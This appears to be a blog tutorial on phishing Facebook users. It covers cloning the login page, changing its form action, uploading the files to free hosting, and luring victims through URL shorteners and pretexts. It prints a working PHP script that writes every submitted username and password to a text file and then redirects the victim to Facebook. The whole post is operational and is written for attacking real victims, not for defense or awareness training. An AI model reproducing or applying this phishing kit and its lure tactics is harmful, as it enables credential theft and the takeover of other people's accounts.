Hello and welcome to another facebook hacking tutorial. This time I will be showing you how to manually create a phishing page and hack facebook with phishing and social engineering. I will show two methods one is the easy one for beginners who want to just test the hack and the second one is for those wanting to learn hacking and pentesting and create their custom facebook phishing page.
A phishing attack is the attack method used by hackers in which they create a copy of the original site which is exactly same as the original website. Then by using social engineering and creativity, they send the phishing link to people to sign in. Once someone signs in their credentials. Hackers can easily get the username and password of the victim in text format.
So in this tutorial, I’m going to explain both the easy and the technical way of hacking facebook with a custom phishing page.
Easy method for hacking facebook:
- Download the hack files: For mobile and for desktop (prefer desktop since they are undetected)
- Free hosting: 000webhost
- You can actually use any hosting but I would suggest this since its that’s what I will be using for this tutorial.
Steps to create a Fake Facebook phishing page
Step 1: Visit the 000webhost website and click on SignUp for FREE using any email. It’s very important to Verify your Email via the validation message you receive for your account to be active.
Step 2: Now register using your Email id, set a password and select a website name which is good for your phishing.
Step 3: After verification of your Email Address, click on File Manager and then click on Upload files Now as shown in the image below:
Step 4: Now you will be redirected to the actual File Manager of your website which is as shown below:
Step 5: You will start at the public_html Folder, which is exactly where you want to be. Upload both the files downloaded index.html and post.php depending on whether you want to hack mobile or desktop version of facebook.
Step 6: Click on upload icon in the Right corner of the File Manager as shown in the image below.
Step 7: Now select both the files index.htm and post.php and click on the upload button as shown in the image below:
Step 8: Navigate to Website list in the panel and copy your Website link address which you previously created.
Mobile Facebook Phishing page:
Desktop facebook phishing page:
Step 9:Once the target logins to the website you will see the following file called username.txt in the file manager as shown below:
Step 10: Open the file to see the email id and password of the account.
Here I used: sas and sas as my facebook email and facebook password.
Viola, you have successfully hacked facebook account using phishing.
Now for those willing to learn let’s learn the technical details of hacking facebook manually here is the advanced version where you make your files.
Advanced method: making your custom facebook phishing page manually.
Step 1: Open facebook.com
To create a phishing page, go to the Facebook.com and then right-click on the blank area. You will see many options you need to click on the view source page option. As you can see below in the image.
Step 2: Create a local copy of the facebook page for making the phishing page
When you click on view page source a new tab will open as shown below showing all bunch of code. This is the source code of the facebook page. You are going to edit it so that you can use it to make a facebook phishing page. To do that:
Select all code and copy all code and paste it into notepad and save the file as index.htm. The file extension is .htm not .html do not make this mistake.
Facebook page source
Copied facebook source code for phishing in notepad
Step 3: Edit the source code
Now open notepad in which you have pasted this code and press CTRL+F and type ACTION in the search bar. This is a little tricky but you have to find the following line in the code.
action="https://www.facebook.com/login.php?login_attempt=1&lwv=110"
When you find the code similar to the code I mentioned above, delete all the text code in front of the word action and replace it with the word post.php as shown below:
Then the final code will look like this:
action="post.php"
Facebook page source edited for phishing
Step 4: Save the files
Now if you haven’t already saved it, then save it to a new folder with the name index.htm Now you have completed part one of the phishing page.
Step 5: Creating the PHP file
To create the second part of facebook phishing page you need to create a PHP file. I am naming my file as post.php since that is what I edited in the source code in part one. If you plan on using a different name make sure to change it in index.htm as well.
Open a new notepad file and copy the code given below and save it with the name post.php. You can refer the images below for reference:
<?php
header (‘Location:http://www.facebook.com/’);
$handle = fopen(“usernames.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($handle, “\r\n”);
fclose($handle);
exit;
?>Step 6: Copy the facebook phishing files together
Now, You have successfully created two files which should be saved in the same folder.
- index.htm
- post.php
Step 7: Create an account free hosting web account
Visit the 000webhost website and click on SignUp for FREE using any email. It’s very important to Verify your Email via the validation message you receive for your account to be active.
Step 8: Open file manager and Upload the files
Now open Cpanel (control panel) on the dashboard of your hosting. Open the file manager and then click on file manager go to public_html folder. By default, you should be in this folder
Step 9: Upload index.htm and post.php
Click on upload files button and upload both files you had previously saved as shown in the images below.
Step 10: Make sure all the files are uploaded.
Make sure all the phishing files are uploaded and then open your website. You should see the original facebook page but when you see the URL you will know that it is a phishing page
Step 11: Navigate to Website list in the panel and copy your Website link address which you previously created.
Desktop facebook phishing page:
Step 12:Once the target logins to the website you will see the following file called username.txt in the file manager as shown below:
Step 13: Open the file to see the email id and password of the account.
Here I used: sas and sas as my facebook email and facebook password.
Viola, you have successfully hacked facebook account using phishing. This is your custom made phishing page for Facebook. Hope you liked it and it worked as expected.
Social engineering tricks hackers use to hack facebook:
1)When you are trying to send phishing link to the target victim, you need to use a URL shortener like TinyURL that will help mask the domain.
2) Choose a good domain which will be trusted by the target.
3) Be creative. A good pretext is needed so that the target will not suspect.
No comments:
Post a Comment